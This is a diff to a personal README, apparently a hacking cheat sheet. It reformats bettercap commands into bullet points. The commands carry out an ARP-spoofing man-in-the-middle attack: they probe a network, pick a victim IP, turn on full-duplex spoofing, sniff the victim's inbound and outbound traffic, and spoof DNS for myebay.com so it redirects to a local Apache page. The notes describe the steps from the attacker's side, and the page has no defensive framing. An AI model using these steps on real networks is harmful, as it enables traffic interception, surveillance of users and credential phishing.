elithaxxor/GUIDES/README.md

 [bettercap - GUI ]:
 sudo bettercap -caplet http-ui

+* net.probe on [shows whos on the network]
+* net.show [gives list of MAC and IP in graph]
+* set arp.spoof.targets [192.xxx]
+* arp.spoof on
-net.probe on [shows whos on the network] net.show [gives list of MAC and IP in graph] set arp.spoof.targets [192.xxx] arp.spoof on net.sniff on [tells attacker what the victim is doing [inbound and out bound] set dns.spoof.domains myebay.com [redirects to APACHE config]
+* net.sniff on [tells attacker what the victim is doing [inbound and out bound]
+* set dns.spoof.domains myebay.com [redirects to APACHE config]

-set arp.spoof.targets 192.168.1.10 [sets  spoof to victim] set arp.spoof.fullduplex true [sets attack to victim and  host] set arp.spoof.targets 192.victim_ip(IP address of the target Device) arp.spoof on
+* set arp.spoof.targets 192.168.1.10 [sets  spoof to victim]
+* set arp.spoof.fullduplex true [sets attack to victim and  host]
+* set arp.spoof.targets 192.victim_ip(IP address of the target Device)
+* arp.spoof on

-set net.sniff.local true
+* Vset net.sniff.local true
-net.sniff on
+* net.sniff on

 --------------------------------------------------- [ARP & SPOOF- Capture + REDIRECT TRAFFIC MITM] --------------------------------------
 [bettercap] --->> This will capure all websies visited by the target.